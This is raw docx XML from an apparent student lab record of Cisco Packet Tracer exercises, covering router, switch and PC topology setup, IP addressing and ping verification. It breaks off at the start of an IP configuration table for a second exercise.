    <w:p w14:paraId="709ACCBA" w14:textId="7B0E7E79" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00916375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00916375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cisco Packet Tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD013D" w14:textId="7D681323" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00916375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00916375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and place devices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71158328" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00DB13EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>1 Router (e.g., Cisco 2911)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61559B6D" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00DB13EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>2 Switches (e.g., 2960)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C389537" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00DB13EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>4 PCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7A2BE" w14:textId="2F7D20D0" w:rsidR="00434A64" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00916375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the devices using Copper Straight-Through cables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB64193" w14:textId="2D227F22" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>PC0 → Switch0 (F0/1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE716E" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>PC1 → Switch0 (F0/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52584F" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>PC2 → Switch1 (F0/1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412B641" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>PC3 → Switch1 (F0/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE69022" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:lastRenderedPageBreak/>
        <w:t>Switch0 → Router (G0/0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34347538" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00434A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Switch1 → Router (G0/1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B81AB66" w14:textId="062E9081" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00716927">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Assign</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to PCs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189961E4" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="00716927">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>LAN1 → 192.168.1.0/24 (PC0, PC1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D28A4" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>LAN2 → 192.168.2.0/24 (PC2, PC3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1CF9FC" w14:textId="09B0C83D" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Configure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AF33A8" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Interface G0/0 → 192.168.1.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D7838" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Interface G0/1 → 192.168.2.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9BB0F" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Use no shutdown command to activate interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA0991" w14:textId="725422F2" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t xml:space="preserve"> Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Default Gateway </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> each PC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DAE5A" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>For PCs in LAN1 → 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96B91D" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>For PCs in LAN2 → 192.168.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4888A5" w14:textId="576B71B5" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Verify</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AEE634" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Use the ping command from one PC in LAN1 to a PC in LAN2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC21E93" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Check for successful replies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BC464" w14:textId="2CB84345" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB13EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A2C1C" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRPr="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="002967BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB13EE">
        <w:t>If packets are successfully received, the topology is working correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7780E" w14:textId="77777777" w:rsidR="00DB13EE" w:rsidRDefault="00DB13EE" w:rsidP="007414E7"/>
    <w:p w14:paraId="2AF24C2C" w14:textId="4A63B8AC" w:rsidR="00F366AE" w:rsidRDefault="007B7F52" w:rsidP="007414E7">
      <w:r w:rsidRPr="002D26A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D26A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672BF69" w14:textId="77777777" w:rsidR="002D26A1" w:rsidRDefault="002D26A1" w:rsidP="007414E7"/>
    <w:p w14:paraId="3CE4552A" w14:textId="3F43C779" w:rsidR="002D26A1" w:rsidRDefault="004B2233" w:rsidP="007414E7">
      <w:r w:rsidRPr="004B2233">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2648375D" wp14:editId="0AA17924">
            <wp:extent cx="5731510" cy="5353050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1105296323"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96323" name="Picture 1" descr="A diagram of a computer network&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5353050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719C9FA" w14:textId="77777777" w:rsidR="004B2233" w:rsidRDefault="004B2233" w:rsidP="007414E7"/>
    <w:p w14:paraId="7E5D3C2A" w14:textId="77777777" w:rsidR="004B2233" w:rsidRDefault="004B2233" w:rsidP="007414E7"/>
    <w:p w14:paraId="377BD66F" w14:textId="0EB055CA" w:rsidR="00F13FC0" w:rsidRDefault="004B2233" w:rsidP="007414E7">
      <w:r w:rsidRPr="004B2233">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C228006" w14:textId="744BFC0F" w:rsidR="004B2233" w:rsidRDefault="00F13FC0" w:rsidP="007414E7">
      <w:r w:rsidRPr="00F13FC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2211B3D4" wp14:editId="724C14A2">
            <wp:extent cx="4363059" cy="2114845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165622915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29154" name="Picture 1" descr="A computer screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4363059" cy="2114845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763B714" w14:textId="2FF1B571" w:rsidR="004D59D7" w:rsidRDefault="004D59D7" w:rsidP="007414E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attachment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F083050" w14:textId="4B7CD304" w:rsidR="004D59D7" w:rsidRDefault="00B94997" w:rsidP="007414E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="1520" w:dyaOrig="987" w14:anchorId="47DFD39E">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:75.6pt;height:49.2pt" o:ole="">
            <v:imagedata r:id="rId25" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1823145910" r:id="rId26"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E770117" w14:textId="77777777" w:rsidR="004D59D7" w:rsidRDefault="004D59D7" w:rsidP="007414E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AC8BF9" w14:textId="07735455" w:rsidR="00F13FC0" w:rsidRDefault="00F13FC0" w:rsidP="007414E7">
      <w:r w:rsidRPr="00F13FC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E569114" w14:textId="42531ECC" w:rsidR="00F13FC0" w:rsidRDefault="00A9682D" w:rsidP="007414E7">
      <w:r w:rsidRPr="00A9682D">
        <w:t xml:space="preserve">A simple network topology using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9682D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one router, two switches, and multiple PCs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9682D">
        <w:t xml:space="preserve"> was designed and configured successfully in Cisco Packet Tracer. Communication between both networks was verified using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9682D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9682D">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9AACA8" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="336C09E2" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="40140608" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="1494C132" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="6B239A15" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="234DB6C8" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="317660C6" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="2220DFC7" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="3DE61B8B" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="18B8476A" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="22826190" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="49F55F15" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="6C44E83A" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="1F11B8AF" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="05A3018A" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="6DE1DE29" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="70BABB85" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="3BBB38CA" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="42F36272" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="4380C431" w14:textId="77777777" w:rsidR="00A9682D" w:rsidRDefault="00A9682D" w:rsidP="007414E7"/>
    <w:p w14:paraId="32EB718F" w14:textId="2C86AB77" w:rsidR="00A9682D" w:rsidRDefault="001E5243" w:rsidP="00D038EC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00D038EC" w:rsidRPr="00D038EC">
        <w:t>USTOMIZE SWITCH WITH NETWORK MODULES USING CISCO PACKET TRACER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A034C37" w14:textId="77777777" w:rsidR="00D038EC" w:rsidRDefault="00D038EC" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0CA89963" w14:textId="699791A1" w:rsidR="00D038EC" w:rsidRDefault="00D038EC" w:rsidP="00D038EC">
      <w:r>
        <w:t>Ex.</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>No:</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4880E" w14:textId="77777777" w:rsidR="00D038EC" w:rsidRDefault="00D038EC" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1516351A" w14:textId="77777777" w:rsidR="00CE2C8C" w:rsidRPr="00CE2C8C" w:rsidRDefault="00CE2C8C" w:rsidP="00CE2C8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2C8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFD428" w14:textId="77777777" w:rsidR="00CE2C8C" w:rsidRDefault="00CE2C8C" w:rsidP="00CE2C8C">
      <w:r w:rsidRPr="00CE2C8C">
        <w:t>To establish communication between two PCs on different networks using a router in Cisco Packet Tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA57DC" w14:textId="77777777" w:rsidR="00C8736A" w:rsidRPr="00CE2C8C" w:rsidRDefault="00C8736A" w:rsidP="00CE2C8C"/>
    <w:p w14:paraId="6F989A05" w14:textId="77777777" w:rsidR="00C8736A" w:rsidRPr="00C8736A" w:rsidRDefault="00C8736A" w:rsidP="00C8736A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8736A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Devices Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C59B7B6" w14:textId="77777777" w:rsidR="00C8736A" w:rsidRPr="00C8736A" w:rsidRDefault="00C8736A" w:rsidP="00C8736A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8736A">
        <w:t>1 × Router (Cisco 2911)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9B1BC" w14:textId="77777777" w:rsidR="00C8736A" w:rsidRPr="00C8736A" w:rsidRDefault="00C8736A" w:rsidP="00C8736A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8736A">
        <w:t>2 × PCs (PC0 and PC1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854535D" w14:textId="77777777" w:rsidR="00C8736A" w:rsidRPr="00C8736A" w:rsidRDefault="00C8736A" w:rsidP="00C8736A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C8736A">
        <w:t>2 × Copper Straight-Through Cables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94DFB6" w14:textId="5E471700" w:rsidR="00F102DC" w:rsidRDefault="00F102DC" w:rsidP="00F102DC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0349DD3A" w14:textId="36E536C5" w:rsidR="00F102DC" w:rsidRDefault="00F102DC" w:rsidP="00F102DC">
      <w:r w:rsidRPr="004709F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ip configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004709F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E458969" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRPr="00F102DC" w:rsidRDefault="00F102DC" w:rsidP="00F102DC"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7820" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="853"/>
        <w:gridCol w:w="2090"/>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="1599"/>
        <w:gridCol w:w="1943"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F102DC" w14:paraId="56F5C872" w14:textId="77777777" w:rsidTr="00F102DC">
        <w:trPr>
